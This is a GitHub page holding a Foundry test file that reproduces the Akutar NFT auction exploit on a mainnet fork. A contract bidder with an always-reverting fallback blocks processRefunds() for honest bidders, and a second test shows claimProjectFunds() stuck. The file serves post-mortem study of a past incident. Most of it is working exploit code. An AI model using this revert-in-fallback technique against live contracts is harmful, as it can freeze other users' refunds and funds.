-
Notifications
You must be signed in to change notification settings - Fork 1.2k
/
Copy pathAkutarNFT_exp.sol
68 lines (52 loc) · 2.77 KB
/
AkutarNFT_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Akutar NFT Denial of Service(DoS) Exploit PoC
There are two serious logic vulnerabilities
1. First can cause a DoS attack due to the missing check if the bidder is a contract. As a result, the attacker can call the revert() and stop the honest bidders from getting back their bid amount.
2. The Second will make the project fund (more than 34M USD) being locked forever due to incorrect check in the require statement.
forge test --contracts ./src/test/AkutarNFT_exp.sol -vv
*/
contract AkutarNFTExploit is Test {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IAkutarNFT akutarNft = IAkutarNFT(0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d);
function setUp() public {
cheats.createSelectFork("mainnet", 14_636_844); // fork mainnet at 14636844
}
function testDOSAttack() public {
address honestUser = 0xca2eB45533a6D5E2657382B0d6Ec01E33a425BF4;
address maliciousUser = address(this); // malicious User is a contract address
cheats.prank(maliciousUser); //maliciousUser makes a bid
akutarNft.bid{value: 3.5 ether}(1);
console.log("honestUser Balance before Bid: ", honestUser.balance / 1 ether);
cheats.prank(honestUser); //honestUser makes a bid
akutarNft.bid{value: 3.75 ether}(1);
console.log("honestUser Balance after Bid: ", honestUser.balance / 1 ether);
//Set the block.height to the time when the auction was over and processRefunds() can be invoked
//https://etherscan.io/tx/0x62d280abc60f8b604175ab24896c989e6092e496ac01f2f5399b2a62e9feaacf
//use - https://www.epochconverter.com/ for UTC <-> epoch
cheats.warp(1_650_674_809);
cheats.prank(maliciousUser);
try akutarNft.processRefunds() {}
catch Error(string memory Exception) {
console.log("processRefunds() REVERT : ", Exception);
}
//Since the honestUser's bid was after maliciousUser's bid, the bid amount of the honestUser is never returned due to the revert Exception
console.log("honestUser Balance post processRefunds: ", honestUser.balance / 1 ether);
}
function testclaimProjectFunds() public {
address ownerOfAkutarNFT = 0xCc0eCD808Ce4fEd81f0552b3889656B28aa2BAe9;
//Set the block.height to the time when the auction was over and claimProjectFunds() can be invoked
cheats.warp(1_650_672_435);
cheats.prank(ownerOfAkutarNFT);
try akutarNft.claimProjectFunds() {}
catch Error(string memory Exception) {
console.log("claimProjectFunds() ERROR : ", Exception);
}
}
fallback() external {
revert("CAUSE REVERT !!!");
}
}